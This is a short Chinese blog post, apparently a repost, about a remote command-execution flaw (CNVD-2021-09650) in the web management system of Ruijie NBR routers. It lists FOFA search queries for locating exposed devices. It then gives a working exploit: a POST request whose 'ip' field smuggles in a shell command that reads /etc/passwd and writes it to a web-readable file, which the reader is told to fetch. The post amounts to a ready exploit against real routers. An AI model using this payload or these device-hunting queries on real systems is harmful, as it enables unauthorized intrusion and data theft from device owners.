漏洞描述
i ⭐
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限
漏洞影响
s ✅
锐捷NBR路由器 EWEB网管系统
空间测绘
d ⭕
FOFA:title="锐捷网络-EWEB网管系统"
⭕
FOFA:icon_hash="-692947551"
漏洞复现
- ✅访问首页
- ✅执行Payload命令
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
文章来源:https://www.toymoban.com/news/detail-613420.html
- 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果
文章来源地址https://www.toymoban.com/news/detail-613420.html
个人博客
孤桜懶契:https://gylq.gitee.io/time
到了这里,关于锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!